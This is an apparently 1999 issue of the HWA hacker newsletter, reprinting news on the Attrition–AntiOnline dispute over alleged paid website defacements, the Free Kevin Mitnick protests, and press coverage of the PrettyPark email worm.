can confirm that after the first A-S Meet-up we plan to hold one every
month thereafter on the last Saturday of each month.
In A-S15 we'll publish literally ALL the details we can find that you might
need to know for the meet-up, including a selection of venues for
accommodation and all their contact details.
Cheers
-Armageddon
Editor of A-S Mag / HNC.
http://www.antisocial.cjb.net
http://www.hack-net.com
------------------------------------------------------------------------
Make the News Come to you! FREE email newsletters sent directly to
your in-box USAToday, Forbes, Wired, and more. Sign-up NOW!
http://clickhere.egroups.com/click/316
eGroups.com home: http://www.egroups.com/group/a-s_mag
http://www.egroups.com - Simplifying group communications
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
int main(void)
{
    printf ("Read commented source!\n\n");
    /*Well several problems kept me from producing the newsletter for the last couple of
     *weeks so this is a 'make-up' release covering June 6th-26th 1999. Some areas may
     *have been glossed over in order to keep the issue down in size,we'll be back to
     *"normal" (whatever that is) next week... meanwhile have fun.
     *
     *Issue #22 June6th-26th
     *
     *BTW The reason ZDNet articles are not reprinted here is because they are using some
     *funky method to defeat cutting and pasting of their text using framesets and shit if
     *anyone knows a way to grab the text (source doesn't work either for some sites) let
     *me know and i'll be most thankful... Cruci.
     *
     */
    printf ("EoF.\n");
    return 0;
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 AntiOnline Crosses the Line
~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by whoever
After garnering intense media coverage (CNN, C|NET,
WIRED, etc.) over his extremely early reporting of the
MOD and gH attacks, John Vranesevich of AntiOnline
has used that spotlight to further his own agenda. Now
he has admitted to nurturing a hatred of hacking and
the underground as a whole and at the same time aiding
and abetting criminal acts, "Many times, I knew about
these instances beforehand, and could have stopped
them."
AntiOnline Statement
A Change In Our Mission
An AntiOnline Editorial
Friday , June 04 1999
In the past, a hacker was an individual who literally had to spend years to learn the inner workings of computer technology, programming, and
hardware. Only then could he begin to explore possible vulnerabilities, and develop, for himself, ways to exploit those vulnerabilities, and more
importantly, ways to patch them. Throughout these years of learning, the hacker would develop a certain respect for the technology that he was
studying, and a certain level of maturity would inherently develop as well. Now, in present day society, with point and click utilities abound, a younger,
less mature, less knowledgeable, and less respectful, generation of "hackers" have come to life.
That's a quote from an editorial that I wrote in September of last year. Now, only 7 months later, we've seen things get even worse.
When I started AntiOnline 5 years ago, it was a way for me to share with others the fascinating things that I myself was learning. The wonders of technology, how it
could be used as a tool, how it could be used as an incredible way to learn, meet new people, and indeed, make the world a smaller and more understanding place.
Since then, AntiOnline has grown to levels I never dreamed possible. I'm fortunate enough to be working full time on the site, I have my own office, equipment, and
T1 line. The resources I have at my disposal are still small and modest, but I've come a long way from where I was a year ago, running AntiOnline out of my parents'
living room.
Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into
hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers, and yes, people who have even attempted to sell
data to individuals that presented themselves as being foreign terrorists. I've seen people change the medical records of individuals in our armed services, and delete
the work of tens of thousands of people that resided on large ISPs. Many times, I knew about these instances beforehand, and could have stopped them.
I felt at the time, that I was serving a larger good by simply writing up information that I knew about these instances, and posting them on AntiOnline for the world to
read about. I felt that the incidents would be learning experiences, and that they would help technology to evolve, even if it was only in some small way. To me, the
important thing was not telling the world the "who", but the "why" and the "how". I tried to stand in an invisible realm between the hacker culture, and mainstream
society. A realm which I now see does not exist.
Looking back, I see those years as being not beneficial to anyone but myself. Those years acted as an educational experience for me. A time for me to learn about
the "mechanics of the gun", but more importantly, a time for me to learn about the "people that pull the trigger".
In the past 7 months, I have seen things go from bad to worse. Incidents are becoming more frequent and more serious. To some degree, things are in a state of
anarchy. I now feel that I am in a position to help serve, even if in some very small way, the better good.
A little note to the Federal and Military Authorities that read this site:
I feel that I have been lax in my duties as a citizen to some degree. But, little known to the rest of the world, I have been working behind the scenes to change that.
For the past few months, we've been working with an Air Force contractor to help them develop the "profile of a hacker". AntiOnline, as an organization, plans on
taking that to an even higher level as the months progress.
Several of you have already signed up for access to our knowledge base, including individuals from: The US Congress, The DISA, The Air Force, The Navy, and
several police and computer forensics organizations. You will be given access information within the next week.
A note to these organizations as a whole. I know that often times my exact position and role has been confusing. Let it be confusing no more. I hope that over the
next few months, the level of trust between my organization and yours can continue to grow, and I hope that AntiOnline becomes a valuable tool in the fight against
"CyberCrime".
Now, a little note to the thousands of hackers that read this site:
You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your own opinions. You yell and scream about
privacy, yet you install trojans into other's systems, and read their personal e-mail and files. You truly are hypocrites. All of these grand manifestos that you develop
are little more than excuses that you make up to justify your actions to yourself. Actions which you know are wrong. Actions which do not serve anyone's interests
but your own.
Let me just say, that you've had free rein over things this past year or so. I know that some of you are playing what you feel is a game. A game that you think you
are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet
are careful not to provide enough information to actually have it proven.
I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
As a side note, AntiOnline will be taking no press inquiries into this matter.
Questions regarding this change in policy will not be answered by phone.
Send all questions or comments to jp@antionline.com
-=-
A special report has now been released that details the
close ties that John Vranesevich of AntiOnline has with
the evil doers of the underground. This report claims
that John Vranesevich actually paid individuals who later
broke into web sites and then gave him 'exclusive'
reports. This report is highly suggested reading for any
journalist or reporter who has ever questioned Mr.
Vranesevich about anything. It is also suggested that
'customers' of the AntiOnline Knowledge Base read this
report and be familiar as to the type of person that is
supplying this information. And finally any law
enforcement officer who is investigating the
whitehouse.gov or any other MOD cracks should
absolutely read this report.
AntiOnline Crosses the Line
http://www.attrition.org/negation/special/ (Go here for full links and info)
AntiOnline crosses the Line
6.7.99
INTRO:
John Vranesevich is the founder of AntiOnline [www.antionline.com].
During the past five years, AO has grown from a five megabyte hobby web site, into a
multi domain business venture with hundreds of thousands of dollars in venture
capital. AntiOnline now claims to be the number one security resource on the Internet.
Despite this growth and development, AntiOnline has been under continual fire from
critics and friends alike. Serious questions have been raised about the methods of reporting,
staff background, journalistic integrity and business practice.
Since AntiOnline has become a commercial entity (02-22-99), the site has released
67 pieces (some news articles, some 'specials'). Of these, 12 have been found to
contain serious errata. So of the 'reporting' that AntiOnline
has conducted, close to 20% has been inaccurate.
Recently, information has come to light that suggests a far more serious agenda
exists at AntiOnline. In the past, AntiOnline had two incidents that brought them
into the spotlight, and put them on a journalistic pedestal so to speak.
The first was centered around two teenagers in Cloverdale CA, and one adult in Israel that
was known as "Analyzer". AntiOnline got the scoop that these three (and others) were
responsible for compromising hundreds of military and government servers.
Through repeated interviews and communication, AntiOnline managed to hype up these
attacks which led to them being described as "the most organized and systematic
attack the Pentagon has seen to date." A short while later, it was discovered that
this threat was nothing more than a group of mostly teenagers breaking into low
security machines.(1)
The second spotlight shone on AntiOnline after several exclusive stories and interviews
with a group calling themselves "The Masters of Downloading". AntiOnline reported
that the members of this group were responsible for compromising hundreds of
"high security" Department of Defense computer systems, and stealing
files they said were "obtained from the classified Defense Information System
Network." Interviews between AntiOnline and the cracker said "I think international
terrorist groups would be interested in the data we could gain access to.."
Media outlets such as ZDNet unknowingly drew comparisons in the two stories.
ZDnet said in one article(2) "The alleged hack - which follows a highly publicized
attack on Pentagon computers by an Israeli hacker known as the "Analyzer" and his
associates -- would be a major escalation of "informational warfare" on
government computers."
From all appearances, AntiOnline was single handedly responsible for a significant
amount of the media sensationalism. Not only had AntiOnline driven the media hype
behind the stories, they put various government and DOD organizations on full
alert preparing for the fallout these attacks would cause.
New information coming to light suggests that AntiOnline had a more integral
part in the generation of their news. That the typical journalist/contact relationship
did not exist, and in fact, AntiOnline may have been responsible for creating some
of the news to report on.
With these recent allegations coming to light, the ATTRITION staff and several
associates set out to find out the details and foundations of the assertions.
OUR GOAL:
To prove Masters of Downloading (MOD, headed by a hacker named so1o) was paid by
John Vranesevich/AntiOnline to hack www.senate.gov or another high profile site in
order for AntiOnline to break major news. To further establish that AntiOnline
employs active and potentially malicious hackers.
REQUIREMENT:
To prove this, we must first prove several points.
allegation                        evidence
----------                        --------
so1o is on Antionline payroll     proof.1 (Email)
so1o == Chris McNab               proof.2 (Email)
so1o is an MOD member             proof.3 (Comparison of MOD/CZ hacks)
                                  proof.5 (IRC chat with so1o)
AO reported on it first           proof.4 (AntiOnline reports)
ADDITIONAL:
On June 3rd, 1999, John Vranesevich released an editorial titled
"State of the Union". This piece calls into question the true relationship
between Mr. Vranesevich and Chris McNab (a.k.a. so1o). The relevant text
and concern it raises, coupled with the time of this editorial and subsequent
information presents a more damning argument.
On June 4th, 1999, John Vranesevich released a more dramatic and disturbing
editorial titled A Change in Our Mission. To most of his readers,
this was no doubt surprising, but expected. For a smaller group of us, the timing
of this article suggests much more. On the afternoon of June 3rd, an individual
questioned Mr. Vranesevich about his ties to so1o. When challenged,
Vranesevich begins to deny his involvement with McNab. This denial comes
after mail explicitly stating he WAS funding McNab, and after working with
McNab on an AntiOnline "exclusive" on the MOD hacks. The following
log and comments illustrate the denial and further backs our goal.
CONCLUSION:
One would hope that high ethical standards are above the law and are in effect
with ANY media outlet. It seems that isn't true. Not only has AntiOnline descended
into the realm of unethical journalism and business practice, they have done it
while thumbing their nose at the Internet. As if they can commit these practices
with impunity, John Vranesevich taunts "Well, it would take a lot more than an act
of congress to get AntiOnline shut down =) I could always ship the site off
to England ;-) That's another good thing about the Internet. The laws of one land
don't hold true in them all ;-)". This was written as a reply to one comment in
the AntiOnline mailbag on 7-13-98.
As if this is not bad enough, Vranesevich has recently gone on to admit to
some of his deeds. In a "change of mission statement" released on 6.4.99,
he goes on to say "Many times, I knew about these instances beforehand, and
could have stopped them."
The information presented above is more than adequate proof that John Vranesevich
is funding an active hacker to break into high profile sites. The motivation for this
is to increase the awareness and therefore the profitability of his web site AntiOnline.
He pays people to break into sites in order to report on it as an 'exclusive'.
Folks.. 1 + 1 still = 2.
Direct comments or questions to: staff (staff@attrition.org)
* Any instance of [snip...] is strictly removing unrelated material. Anything
relevant to our argument or anything that would affect our allegations
were left. What we do is no different than what JP does to his 'mailbag'.
Except we leave in material that would possibly weaken our argument. His
mailbag gets clipped to include only the material he wants to deal with.
* Permission from Bronc and Ken was given to include the email here.
@HWA
03.1 More Questions Raised about John Vranesevich and AntiOnline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th
from HNN http://www.hackernews.com
contributed by Bronc Buster
The rhetoric continues. Did he or didn't he? John
Vranesevich has posted a rebuttal to the original
attrition.org report that claimed he funded crack
attempts. The rebuttal is more of a personal attack
than a response to the allegations. Wired Online and
Telepolis have written articles that try to shed some
light on the situation. Bronc Buster has written an open
letter to John Vranesevich that asks some very pointed
questions. Questions that I think everyone would like an
answer to.
Attrition Report on John Vranesevich
http://www.attrition.org/negation/special/
John Vranesevich Rebuttal
http://www.antionline.com/cgi-bin/News?type=antionline&date=06-07-1999&story=brian.news
Wired Online
http://www.wired.com/news/news/culture/story/20062.html
Telepolis- German
http://www.heise.de/tp/deutsch/inhalt/te/2921/1.html
Open letter from Bronc Buster
http://www.hackernews.com/orig/broncjplet.html
The Wired article and JP and Bronc's letters follow:
Wired;
Hacker Pundits Squabble
by Polly Sprenger
12:15 p.m. 7.Jun.99.PDT
A Web site addressing computer hacking issues has accused a computer security
pundit of paying individuals to break into Web servers in exchange for exclusive
coverage of the stories that result.
John P. Vranesevich, editor of computer security magazine and resource center
AntiOnline, denies the charges.
Vranesevich is well known in the hacking and cracking community. He is often
called on by news media, including Wired News, to provide perspective on Web site
break-ins, viruses, and other security issues.
A report by the group Attrition.org, released Monday, accuses Vranesevich of
paying hackers to break into sites, thus guaranteeing him an exclusive on the
stories.
"We've never paid for a story," Vranesevich said. "We don't even pay our
reporters for stories. [The allegations] are flat-out libelous and there's no proof to
it. It's an attempt to destroy, defame, and discredit me."
Vranesevich's detractors were already inflamed over his recent apparent shift in
allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated
he was working with the Air Force and other government agencies to help track
down crackers.
"A little note to the thousands of hackers that read this site," Vranesevich warned,
"I have been watching you these past five years. I know how you do the things
you do, why you do the things you do, and I know who you are."
His warnings have stirred the ire of attrition.org, led by Brian Martin (who
goes by the name Jericho). Martin said he has been following Vranesevich's case for
more than a year.
Martin based his claims on two emails that allegedly show Vranesevich had a
business relationship with "So1o," the hacker accused of breaking into
senate.gov last year. Vranesevich said the emails displayed on Martin's site
"never existed."
Another chronicler of the computer security underground said that
Vranesevich's reputation is less than pristine.
"He has made a lot of enemies over the years," said Space Rogue, editor of the
Hacker News Network. "This particular accusation has been unproven for awhile.
It's been thought that this has been going on for some time, that he was
paying people or was in league with them."
Space Rogue cited one particular revelation in Vranesevich's Friday statement.
"Many times, I knew about these instances [site hacks] beforehand, and
could have stopped them," Vranesevich wrote.
"That basically for me solidifies everything in the attrition report," Space Rogue said.
Vranesevich said that he has never been popular with the underground hacker
culture because of what he's done to expose it. "I often say that they hack a
site first and make up a manifesto second," Vranesevich said.
He points to his press citations in recent weeks, which include mentions in The
New York Times, ABC News, and CNN. He also said that government agencies such
as NASA rely on him to provide data on hacker profiles.
But while Martin accuses Vranesevich of using his fame as a platform to
prosperity, Vranesevich says he doesn't charge those agencies for access to data
and will probably keep the information free of charge forever.
"I think my track record speaks for itself," Vranesevich said. "I'm proud of how I've
accomplished and what I've accomplished."
JP's rebuttal
AntiOnline Responds To Allegations
Monday, June 7, 1999 at 11:51:56
by John Vranesevich - Founder of AntiOnline
First off, for those of you that haven't read it, Brian Martin's
Attrition website has today posted allegations that AntiOnline
funded the Whitehouse.gov and Senate.gov hack so that we
would have news to cover (However, I'm sure most of you have
read it by now, because of organizations, and I use the term
loosely, like the Hacker News Network).
Needless to say, when I went forward with the statement that
AntiOnline was going to help in the fight against malicious
hackers, I expected some backlash from the hacker community.
A few dozen extra hack attempts a day, some synfloods. Maybe
I'd find myself with a $10,000 phone bill. But, they've apparently
chosen something far more creative.
First off, let me say this. Brian Martin (aka Cult_Hero) was
raided by the FBI in connection with being a suspected member
of the HFG (The group that hacked the New York Times), and
Erik Ginorio (BroncBuster) is known, and admits, to breaking into
dozens of sites (he calls himself a hacktivist). The fact that these
two could think, or at least think up, some grandiose scheme
which involved AntiOnline bankrolling hackers, is not surprising.
They have both lived their lives trying to break, and evade, the
law.
For some reason, Brian Martin has become obsessed over
AntiOnline. His website has dozens and dozens of pages of what
he calls "errata" that he's written about it. He takes information
posted on our site out of context, then criticizes us because of it.
Many people have written in asking why we never posted any
response to all of the allegations he has on his site about us.
Personally, it's because I felt that I didn't need to justify myself,
or my actions, to someone who is currently under FBI
investigation, and who has never done anything for the security
scene other than criticize others. I actually feel bad for him. The
fact that he spends such a large portion of his life trying to "bring
down" others using lies, deceit, and twistings of the truth, is sad in
my eyes.
As for these allegations that I paid people to break into
government sites so that I could write a story. Let me just say,
that such claims are so far fetched and preposterous, I'm not
even going to respond to them on a point by point basis.
It seems that almost all of the criticisms that I receive from
people like Brian Martin revolve around money. He says in his
"allegations" about AntiOnline that "During the past five years,
AO has grown from a five megabyte hobby web site, into a multi
domain business venture with hundreds of thousands of dollars in
venture capital." Is that what he's so upset about? That I've made
a ton of money? Well, let me put his mind at ease. The point in
fact, is that I don't now, nor have I ever in my life, had a lot of
money. Our venture funding wasn't in the amount of hundreds of
thousands of dollars. I am not ashamed to say, and in fact, I'm
very proud to say, that our original funding was in the amount of
$75,000. I am very proud of the levels I have taken AntiOnline to
with very little resources, and a lot of hard work. On average, I
put in 17 hour days working on the site and related matters. At
the age of 20, I'm trying to build a life long career for myself. So,
to people like Mr. Martin, let me just say that anything my site
has accomplished has not, and truly couldn't have been, from me
throwing money at it. It came from my love for what I do, and
my willingness to put in the time it takes to accomplish my dream.
In a way, I take these allegations that have come against me as a
sign that I'm on the right track with what I'm doing. If people like
Brian Martin weren't yelling and screaming about me, I guess I'd
take that as a sign that I'm off the beaten path. If people like
Brian Martin didn't see me as a threat to them, they wouldn't be
yelling. So, I'm going to view these recent allegations as a job
well done letter from the malicious hackers of the world.
I have always lived my life in a way which I was proud of, and I
will continue to do so. I will NOT allow people like Brian Martin
and Erik Ginorio to cause me to constantly be taking some sort of
sick defensive on my site (Which is probably what their intentions
are). That's not its purpose. So, if they come out with some new
allegation, like I have secret plans to assassinate the president
with a herf gun or something, you won't find a response to them
from me here. As a matter of fact, you won't find a response
from me at all. I will let the work that I put forth, and the actions
that I take in my daily life, be my response.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
Bronc's open letter;
An open letter to John Vranesevich (aka JP)
07 Jun 1999
from: Bronc Buster bronc@2600.com
subject: in regards to the allegations at
http://www.attrition.org/negation/special
John Vranesevich (aka JP),
The staff of Attrition.org, a few other individuals, and I
have been working over the last few weeks to piece
together a complex web of clues. These clues were
leading us to something we have suspected for a while;
something that could tarnish the entire hacker community.
What if someone, a reporter, was funding a known criminal
to commit crimes so that they might have an inside scoop
on the story? Not only would this be unethical, but illegal,
and dangerous for us all.
Several people have been asking how Antionline.com (AO)
has had such an inside scoop on breaking stories, before
anyone else regarding big hacks that you have reported
on. We have begun to make a theory, based upon facts
as to how we think this is happening.
Here are a few simple YES or NO questions regarding
these allegations and their impact..
1) Because you had reported, in the past, the exclusive
reports and interviews on how Masters of Downloading
(MoD) had hacked(?) DISA and were alleged to have
taken software off their server, it is obvious you knew
who the person was who had committed this crime. His
handle is so1o (aka Chris McNab). You have admitted to
this openly. Knowing this, you then started funding a
company run by Chris McNab to make some sort of
security program. This you have also openly admitted to.
Now Chris McNab, by your own admittance, comitted the
crime of breaking into several Government servers and
ultimatly defacing www.senate.gov. If you were funding
this person, and you knew he was a criminal, not only who
has comitted crimes in the past you knew about, but had
crimes, such as the senate.gov hack, planned out that
you knew about before hand, and he then gave you an
exclusive on the story because he was getting money
from you (regardless if he still is), doesn't this, in your
mind, equal a totaly unethical, not to mention illegal, way
to get a story?
2) On your site, you openly admit to prior knowledge of
crimes that were committed that you may or may not have
reported on. This is illegal. Do you think this fact,
combined with the fact that you, in some fashion, were
supplying a known criminal (Chris McNab) with money is an
ethical way to run your site/business?
3) In the response to the revealed allegations against
you that you posted on your site, there was no link provided
(to attrition.org) so that anyone interested, who may see
this on your site but not know about the allegations, could
see both sides of the story and come to their own
conclusions. Attrition.org posted many links to your site,
so that people could see both sides. Since you posted a
response, don't you think it is only fair to your readers to at
least let them judge this matter for themselves?
4) Do you think that by making personal attacks against
the people behind these allegations, and against the sites
that are covering it, that the serious issues raised have
been answered or at least addressed?
5) Do you in any way feel obligated to provide any
answers to:
a) The people making these allegations?
b) Your readers and supporters?
c) The hacking/security community in general?
6) Last but not least. Do you think anything positive can
be gained by the hacking community by your actions in
these matters?
I personally think that your response to the criminal
charges against you was childish and immature at best,
and this matter warrants a serious reply. Slinging mud,
and voicing your opinion about people is no way to
counter facts. These are felonies, and involve not only
local, but federal laws. This is a serious matter, and like so
many of the poor kids you cover who get busted, it
appears you will not take it seriously until you too have
been arrested and charged.
Bronc Buster
bronc@2600.com
June 9th , a statement from OSAII
Admissions
Mike Hudack
Editor-in-Chief
The same day that a Wired News article about the Attrition
special report accusing AntiOnline of unethical and even criminal
practices came out, I spoke with John Vranesevich on the phone.
The Wired News article quoted Vranesevich (JP) specifically
denying the existence of two e-mails which were used as evidence
in the Attrition article. JP said the e-mails "never existed,"
according to Polly Sprenger, author of the Wired News article.
In my discussion with JP, however, he said "I was quoted out of
context in those e-mails." I queried him further, asking him
whether those e-mails really existed. He said "the e-mails existed
but I was quoted totally out of context -- what I said was in jest."
In a conversation hours later, however, he quickly backtracked,
saying the e-mails were "manufactured, possibly from several
e-mails." He said they were his words in the sense that "words
taken from two pages in a book and made to look like a
paragraph are the author's words. They're still manufactured."
This obvious contradiction between what I was being told the first
time and what he had told Wired News wasn't the end of it
however. He went on to warn me not to "write articles against
individuals or other sites. It doesn't help your relationship with the
mainstream -- I learned that the hard way." This statement was
obviously a warning not to say anything about our conversation.
He went on in his contradictions, however.
In the Wired News article, JP is quoted as saying that the
allegations against him are "flat-out libelous." In the telephone
conversation, however, JP admitted that "the allegations weren't
really libelous. If anything they were borderline." He did say,
however, that it was up to his "lawyer as to whether to pursue
legal action."
The clear dichotomy between his earlier statements to Wired News
and his statements to me wasn't the most fascinating issue,
however. What was much more fascinating, as Polly Sprenger said,
was "why didn't he just say he was quoted out of context? That
would have made a lot more sense."
Later, in an open letter to JP, Bronc Buster called JP's response
to the allegations "childish" for attacking the individuals raising the
allegations and not the allegations themselves. In his response, JP
not once mentions that he was quoted out of context. Rather, he
accuses Jericho and Modify (two authors of the allegations) of
being subjects of an FBI investigation. He not once addresses the
allegations being levelled against AntiOnline and himself.
OSAll carefully weighed whether to come forward with JP's
statements, and has decided that it has an ethical obligation to do
so. Any questions about this coverage, its fairness or OSAll's
relationship with either Attrition.org or AntiOnline.com should be
directed to the editor, who can be contacted at
editor@aviary-mag.com or by phone at 203-335-7100.
@HWA
04.0 The Difficulties of Reporting the Underground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Space Rogue
In light of all the media attention that hackers have
gotten over the last few weeks it is apparent that most
reporters and journalists are having a difficult time
accurately reporting on the computer underground. While
no one is claiming that it is easy, HNN editor Space
Rogue takes a look at some of the more common pitfalls
in this new Buffer Overflow article.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
05.0 Mitnick Demonstrations Deemed a Huge Success
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Freaky, phar, and Silicon Monk
Last Friday at 2pm, in front of federal courthouses in
over 16 cities, people who could no longer sit idly by while
excessive punishment was dealt out by an overreaching
government gathered to protest the large
number of injustices perpetrated during the trial of Kevin
Mitnick. At the demonstrations in Philadelphia a large
paper mache Liberty Bell was displayed. Reba Mitnick,
Kevin's grandmother was present at her local
demonstration. In New York a skywriter wrote FREE
KEVIN over Central Park and in San Francisco low flying
airplanes carried FREE KEVIN banners.
FREE KEVIN
http://www.freekevin.com
Mitnick Demonstrations - Pictures Here
http://www.2600.net/demo/
CNN
http://cnn.com/TECH/computing/9906/04/BC-INTERNET-HACKERS.reut/index.html
Wired
http://www.wired.com/news/news/politics/story/20053.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2270517,00.html
Salon
http://www.salon.com/tech/log/1999/06/04/mitnick/index.html
Wired;
Pro-Mitnick Demos in US, Russia
by Polly Sprenger
3:00 a.m. 5.Jun.99.PDT
In 15 American cities and Moscow,
demonstrators staged protests Friday
against the continued imprisonment of
Kevin Mitnick, jailed after pleading guilty
to seven counts of wire and computer
fraud.
"Just don't call him a 'celebrity cracker,'"
growled Macki, the Webmaster for 2600,
the hacker group and magazine that
organized the events.
Armed with yellow "Free Kevin" stickers
and flyers describing Mitnick's case, Macki
and nearly 20 other Mitnick supporters
battled the miserable San Francisco wind
to fight for the cause.
"We're getting the word out to the
worldwide and national consciousness
about [Mitnick's] sentencing," said Marc
Powell, a pink-haired member of the local
hacker collective New Hack City.
Clad in an "I [Heart] Feds" T-shirt, Powell
said that although his own
cyber-tomfoolery has been strictly within
the law, he sympathized with Mitnick's
imprisonment.
As far as protests go, Mitnick's
demonstration was relatively low-key.
The attendees cheered as a low-flying
airplane went by trailing a banner that
said "Free Kevin Mitnick --
www.freekevin.com," but after seven or
eight more passes, the enthusiasm
waned.
Some in the group had followed Mitnick's
plight from the beginning, but others were
just there to be part of an
anti-government staging. Robin, a
self-proclaimed anarchist and network
administrator with a partially shaved head
and a plethora of piercings, said he was
in attendance because it was a strike
back at the government.
But others, like Perry McNulty, said
Mitnick was a study in civil rights. "It's
not just a hacker in jail," said McNulty,
who has followed Mitnick's case for about
a year. "A lot of civil rights have been
violated. It could happen to any one of
us."
Salon
Kevin Mitnick supporters plan rallies
- - - - - - - - - - - -
BY KAITLIN QUISTGAARD
June 4, 1999 | Since his 1995 arrest for wire and
computer fraud, famed hacker Kevin Mitnick has been
behind bars. In March a judge sentenced him to a
46-month prison term after he pleaded guilty to a
handful of the 25 charges filed against him. But on
Friday, demonstrators in 15 U.S. cities and Moscow
plan to protest what they see as the unjust treatment
of Mitnick and ask for his parole to a halfway house.
"The guy's been in there for something like four years
and four months," says Emmanuel Goldstein, editor of
"2600: the Hacker Quarterly." (Actually, 2600's Kevin
Mitnick Lockdown Clock put it at exactly 4 years, 3
months, 16 days, 11 hours, 19 minutes and 41
seconds at that moment, but who's counting?)
It's a heavy sentence for just looking at other people's
software, says Goldstein: "The federal government is
using him to send a message."
"Even if Kevin were guilty of everything he was
charged with," the 2600 site says, "the fact remains
that there was no documented damage, no evidence of
malicious activity, and nothing to suggest that Mitnick
profited in any way by reading the software he is
accused of accessing." The journal says it has
uncovered letters showing that companies like Sun
Microsystems and Nokia have claimed a combined
total of $300 million in damages resulting from
Mitnick's hacks. "This is a case of corporate
vengeance, aided and abetted by a federal government
seeking to intimidate hackers," the 2600 site argues.
"We think Kevin Mitnick's suffering has gone on way
too long."
2600 is encouraging demonstrators to meet at federal
courthouses across the country and the U.S. Embassy
in Moscow. The protest will coincide with the monthly
2600 meeting, which brings hackers together in
various cities on the first Friday of the month. ("That
way the people who spy on us have to spread
themselves thin," says Goldstein, explaining the
same-time, multiple-locations approach.)
On June 14 a judge will formally sentence Mitnick and
determine the damages he owes. The hacker group
hopes to influence the court to go lightly on Mitnick.
"The judge has the opportunity to sentence him to a
halfway house," says Goldstein, "which is a whole lot
better than a prison with murderers and rapists."
salon.com | June 4, 1999
- - - - - - - - - - - -
About the writer
Kaitlin Quistgaard is an associate editor
for Salon Technology.
@HWA
06.0 New Trojan/Virus, PrettyPark
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by nvirB
A new virus/trojan, PrettyPark, arrives as an email
attachment; once run, it resends itself to the users listed in the
Windows Address Book, possibly repeating this as
often as every 30 seconds. It also attempts to log into
IRC channels to deposit information. Opinions vary as to
the threat level of this new virus. At last report it had only
been seen in France.
MSNBC
http://www.msnbc.com/news/276805.asp
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2270411,00.html
MSNBC
PrettyPark: Part worm, part Trojan
Anti-virus companies unearth worm/Trojan that reportedly
e-mails PC’s Windows Address Book every 30 seconds
By Joel Deane and Michael Fitzgerald
ZDNN
June 4 — Anti-virus companies said Friday that
W32/PrettyPark, a new e-mail worm program with
Trojan horse characteristics, poses a potentially
high risk to Internet users on Windows-based
systems.
Although assessments of PrettyPark's
capabilities vary, and damage reports are sketchy, anti-virus
firms advised Friday that users update their anti-virus
programs to guard against the worm/Trojan, which was
discovered as early as May 12.
Anti-virus company Panda Software said PrettyPark,
which is also known as Pretty Worm, reaches users’
computers as an attached file in an e-mail message, just like
the Melissa virus. Once executed, PrettyPark installs itself in
the infected system, then sends messages with an attached
copy of itself to addresses listed in the Windows Address
Book.
Panda said PrettyPark attempts to connect to an
Internet relay chat server from a list of 13 possible servers,
then send a message to a chat user — enabling the author of
the virus to gather data on and monitor affected workstations.
PrettyPark can then be manipulated as a Trojan horse, Panda
said, to obtain data such as the list of available disks and
confidential information such as logins and Internet
connection passwords.
Panda Software U.S. executive director Pedro
Bustamante said Friday his company had replicated the
“potentially high risk” worm/Trojan in its European anti-virus
lab. “It could potentially be very high risk,” Bustamante said.
“The interesting thing about this new Trojan is that, unlike
Melissa, it doesn’t send itself once; it sends itself every 30
seconds.”
Trend Micro, Symantec and Network Associates
reported Friday that they have been unable to duplicate
PrettyPark. In a virus alert, Network Associates said
PrettyPark was low risk.
Trend Micro director of technology Dan Schrader said
the anti-virus company's customers reported PrettyPark's
auto-spamming, but "can't confirm the auto-spamming
function."
“We’ve seen 40 incidents in the last 48 hours. All the
incidents so far have been in France,” said Schrader, adding
that PrettyPark was similar to the notorious Happy 99
executable that struck earlier this year.
Schrader said PrettyPark has the potential to spread
widely — if it can in fact automatically send itself to
everyone in a user's address book. But, because
Trend Micro has been unable to replicate this auto-spam
capability, and because it so far seems to be centered in
France, Trend Micro suspects that someone may have
spread it by hand.
Symantec, Trend Micro, Panda and Network Solutions
have all posted anti-virus updates to cover PrettyPark.
Luke Reiter of CyberCrime contributed to this report.
@HWA
06.1 The rampage continues
~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
PrettyPark Continues its Rampage
contributed by nvirb
PrettyPark, the latest virus/trojan/worm, is quickly
spreading around the world. The virus arrives as an
email attachment. After it is executed it hides
behind a screen saver while it mails out copies of itself and
connects to an IRC channel. In a quote given to MSNBC,
Steve Trilling of Symantec said, "This virus took months
to write, and its creator put a great deal of effort into
it."
MSNBC
PrettyPark hits Windows users hard
Victims of e-mail virus increase 2,000 percent over the
weekend, Symantec reports
By Shauna Sampson, ZDTV
ZDNN
June 7 — PrettyPark, a French e-mail virus, got a
tremendous boost from home PC users this
weekend. Anti-virus software maker Symantec
said it has observed an increase of 2,000 percent
in apparent victims since Friday.
These victims of the virus, which is being
described as a worm with Trojan capabilities, are likely
Microsoft Windows users who are being sent to a custom
Internet relay chat channel without their knowledge. Once
there, victims' personal data — ranging from e-mail address
book lists, operating system preferences and registration
numbers, passwords, and form data (including stored credit
card information) — can potentially be retrieved from the
victim's PC without their knowledge by the virus writer.
